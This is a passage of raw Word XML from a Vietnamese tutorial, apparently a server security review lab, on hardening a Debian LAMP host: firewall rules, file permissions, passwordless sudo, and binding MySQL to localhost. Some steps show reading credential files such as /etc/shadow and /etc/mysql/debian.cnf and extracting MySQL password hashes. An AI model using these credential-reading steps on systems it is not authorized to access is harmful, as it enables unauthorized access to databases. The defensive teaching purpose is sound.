          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Chúng ta có thể thấy rằng những quy tắc này cho phép lưu lượng truy cập:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D42E472" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Cho phép mọi nơi đều có thể truy cập đến cổng 80 (port 80 HTTP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A42C4C0" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cho phép mọi nơi đều có thể truy cập đến cổng 22 (port 80 SSH).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E82E3B3" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Cổng 80 (HTTP) sẽ cần được truy cập bởi bất kỳ ai trên Internet để truy cập trang web được lưu trữ. Tuy nhiên cổng 22 (SSH) chỉ nên được truy cập bởi các quản trị viên của máy chủ. Một danh sách trắng của địa chỉ IP đáng tin cậy nên được tạo ra để hạn chế quyền truy cập vào máy chủ SSH.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E661DBA"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húng ta cũng cần kiểm tra xem các quy tắc tường lửa sẽ tự động được áp dụng mỗi khi máy chủ được khởi động </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>cat /etc/network/if-pre-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>up.d</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>/iptables</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8F17ED" w14:textId="05064851"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7F8AA5C4">
          <v:shape id="Picture 23" o:spid="_x0000_i1225" type="#_x0000_t75" style="width:341.25pt;height:56.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId221" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6295B124" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Chúng ta cần kiểm tra xem tệp được sử dụng để tải các quy tắc và các quy tắc hiện tại có khớp nhau không</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B9AE50"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 xml:space="preserve">cat /etc/iptables.up.rules  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2560ECAF" w14:textId="69309531"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6795642A">
          <v:shape id="Picture 24" o:spid="_x0000_i1226" type="#_x0000_t75" style="width:336.75pt;height:119.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId222" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1264C334" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Kiểm tra các tệp đặc biệt lưu trữ các tài liệu private</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA15C43" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Điều quan trọng chúng ta phải kiểm tra quyền trên các tệp nhạy cảm.  Theo nguyên tắc chung, bạn nên kiểm tra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5D3CEC" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Các tệp chứa thông tin nhạy cảm (mật khẩu, khóa cá nhân) không thể được đọc bởi bất kỳ người dùng nào.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F7079F" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>không thể sửa đổi tệp chứa cấu hình đó bởi bất kỳ người dùng nào.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEC2918" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Đây sẽ là các tệp mà bất ký người dùng nào cũng không thể đọc được:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F13863" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>/etc/shadow</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> chưa mật khẩu của người dùng (mã băm)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0D106C" w14:textId="5ECD6143"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289E5FC9">
          <v:shape id="Picture 25" o:spid="_x0000_i1227" type="#_x0000_t75" style="width:357.75pt;height:147.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId223" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3BCCA2" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/mysql/my.cnf </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">chưa các mật khẩu của </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>debian-sys-main</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D26550A" w14:textId="0EDC2410"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1F3351F7">
          <v:shape id="Picture 26" o:spid="_x0000_i1228" type="#_x0000_t75" style="width:393pt;height:223.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId224" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="429959F1" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Chúng ta tìm hiểu một chút về cấu hình của lệnh sudo nhé.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101C4F64"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Lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> được cấu hình trong thư mục </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>/etc/sudoers</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291E64D4"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Qua dòng lệnh: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0EE705"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egrep -v '^#|^$</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>'  /</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>etc/sudoers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC161A9" w14:textId="69729687"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0264A09F">
          <v:shape id="Picture 27" o:spid="_x0000_i1229" type="#_x0000_t75" style="width:323.25pt;height:62.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId225" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CC8F19" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Ta có thể thấy tất cả người dùng đều có thể dùng quyền root thông qua lệnh sudo mà ko cần password!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9A91EB"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chúng ta hãy tìm hiểu một chút về cấu hình LAMP (MySQL, Apache, PHP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DCA40F" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Trước tiên chúng ta hãy bắt đầu với MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468EBC6C" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Ta dùng lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">lsof </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDF676E" w14:textId="0CC12918"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7FF59E27">
          <v:shape id="Picture 28" o:spid="_x0000_i1230" type="#_x0000_t75" style="width:444.75pt;height:204.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId226" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="518FCBE3" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Chúng ta thấy rằng MySQL đang lắng nghe trên tất cả các giao diện, với việc sử dụng hệ thống hiện tại. Điều này thật sự không cần thiết và để hạn chế bề mặt tấn công của hệ thống, tốt hơn là chúng ta nên ràng buộc socket trên localhost để ngăn chặn truy cập từ bên ngoài vào dịch vụ này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148DB715"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iều này có thể được thực hiện bằng cách thêm tùy chọn sau vào phần </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>[mysqld]</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> của tệp </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/mysql/my.cnf </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB55E86"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hông qua lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>nano /etc/mysql/my.cnf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F7EF82" w14:textId="5BF459F9"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2202AEB0">
          <v:shape id="Picture 29" o:spid="_x0000_i1231" type="#_x0000_t75" style="width:452.25pt;height:229.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId227" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAC03E1"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húng ta thêm </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">bind-address = 127.0.0.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ngay mục </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>[mysql]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1D844F" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Để cập nhật cấu hình của nó, MySQL sẽ cần được khởi động lại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6669C607" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Bây giờ chúng ta có thể truy cập vào mysql (hệ thống không có mật khẩu).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DEFA26" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Dùng lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>mysql -u root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2F4418" w14:textId="1CA74682"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F82814E">
          <v:shape id="Picture 30" o:spid="_x0000_i1232" type="#_x0000_t75" style="width:429pt;height:147.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId228" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="135420B8" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D77EEB7"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Nếu bạn không có mật khẩu để kết nối với quyền root với cơ sở dữ liệu nhưng bạn đang root trên máy chủ, bạn có thể sử dụng các chuỗi lệnh trên bảng </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Mysql users</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> được lưu trữ trong </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>/var/lib/mysql/mysql/user.MYD</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> để lấy hàm băm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0D9AFB" w14:textId="452566F6"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45FE3ADF">
          <v:shape id="Picture 31" o:spid="_x0000_i1233" type="#_x0000_t75" style="width:423pt;height:100.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId229" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFF4103"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rên Debian, người dùng bảo trì có tên </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>debian-sys-Maint</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> có quyền truy cập vào cơ sở dữ liệu và có thể được sử dụng để kết xuất thông tin từ cơ sở dữ liệu.  Chúng ta có thể tìm thấy mật khẩu cho tài khoản này trong </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>/etc/mysql/debian.cnf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346DE1EA" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Nano /etc/mysql/debian.cnf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76808EF8" w14:textId="33856116"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843FE74">
          <v:shape id="Picture 32" o:spid="_x0000_i1234" type="#_x0000_t75" style="width:429.75pt;height:240pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId230" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF9AC71"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húng ta kết nối đến </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> để truy xuất các datebase!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515937B4" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Khi trong giao diện của mysql chúng ta dùng lệnh truy xuất các thông tin có trong database:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BAC742"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Select @@</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>version;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="267B2B22" w14:textId="13B51394"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773DAA24">
          <v:shape id="Picture 33" o:spid="_x0000_i1235" type="#_x0000_t75" style="width:117.75pt;height:69pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId231" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E32905D" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
